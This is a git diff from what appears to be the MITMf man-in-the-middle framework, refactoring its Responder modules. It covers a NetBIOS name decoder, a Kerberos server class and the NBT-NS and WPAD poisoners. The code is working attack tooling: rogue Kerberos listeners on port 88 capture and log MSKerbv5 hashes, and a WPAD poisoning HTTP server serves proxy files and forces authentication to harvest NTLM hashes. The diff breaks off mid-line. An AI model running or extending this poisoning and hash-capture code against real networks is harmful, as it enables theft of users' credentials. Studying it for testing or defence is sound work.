diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py index a1186f8..aa0c9e1 100644 --- a/core/responder/fingerprinter/LANFingerprinter.py +++ b/core/responder/fingerprinter/LANFingerprinter.py @@ -3,9 +3,9 @@ import socket import threading import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler -from core.configwatcher import ConfigWatcher from core.responder.fingerprinter.RAPLANMANPackets import * mitmf_logger = logging.getLogger("mitmf") @@ -60,6 +60,20 @@ def NBT_NS_Role(data): else: return "Service not known." +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. + try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except Exception, e: + mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e)) + return "Illegal NetBIOS name" + def WorkstationFingerPrint(data): Role = { "\x04\x00" :"Windows 95", diff --git a/core/protocols/kerberos/KERBServer.py b/core/responder/kerberos/KERBServer.py similarity index 75% rename from core/protocols/kerberos/KERBServer.py rename to core/responder/kerberos/KERBServer.py index 40b509f..7b6e6cf 100644 --- a/core/protocols/kerberos/KERBServer.py +++ b/core/responder/kerberos/KERBServer.py @@ -1,35 +1,37 @@ -################################################################################## -#Kerberos Server stuff starts here -################################################################################## + +import socket +import threading +import struct +import logging + +from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler + +mitmf_logger = logging.getLogger("mitmf") class KERBServer(): - def serve_thread_udp(host, port, handler): + def serve_thread_udp(self, host, port, handler): try: server = ThreadingUDPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e)) - def serve_thread_tcp(host, port, handler): + def serve_thread_tcp(self, host, port, handler): try: server = ThreadingTCPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e)) #Function name self-explanatory - def start(Krb_On_Off): - if Krb_On_Off == "ON": - t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) - t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) - for t in [t1,t2]: - t.setDaemon(True) - t.start() - - return t1, t2 - if Krb_On_Off == "OFF": - return False + def start(self): + mitmf_logger.debug("[KERBServer] online") + t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() class ThreadingUDPServer(ThreadingMixIn, UDPServer): @@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +class KerbTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + KerbHash = ParseMSKerbv5TCP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + +class KerbUDP(BaseRequestHandler): + + def handle(self): + try: + data, soc = self.request + KerbHash = ParseMSKerbv5UDP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + def ParseMSKerbv5TCP(Data): MsgType = Data[21:22] EncType = Data[43:44] @@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data): return BuildHash else: return False - -class KerbTCP(BaseRequestHandler): - - def handle(self): - try: - data = self.request.recv(1024) - KerbHash = ParseMSKerbv5TCP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -class KerbUDP(BaseRequestHandler): - - def handle(self): - try: - data, soc = self.request - KerbHash = ParseMSKerbv5UDP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -################################################################################## -#Kerberos Server stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/kerberos/__init__.py b/core/responder/kerberos/__init__.py similarity index 100% rename from core/protocols/kerberos/__init__.py rename to core/responder/kerberos/__init__.py diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py index f67160f..4563c52 100644 --- a/core/responder/nbtns/NBTNSPoisoner.py +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -4,6 +4,7 @@ import threading import socket import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher @@ -105,7 +106,8 @@ def Decode_Name(nbname): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) - except: + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e)) return "Illegal NetBIOS name" # NBT_NS Server class. diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py index a1bd1ef..7aa23f6 100644 --- a/core/responder/wpad/WPADPoisoner.py +++ b/core/responder/wpad/WPADPoisoner.py @@ -2,15 +2,17 @@ import socket import threading import logging -from HTTPPackets import * from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(on_off): + def start(self): try: + mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) t = threading.Thread(name="HTTP", target=server.serve_forever) t.setDaemon(True) @@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + #Parse NTLMv1/v2 hash. def ParseHTTPHash(data,client): LMhashLen = struct.unpack('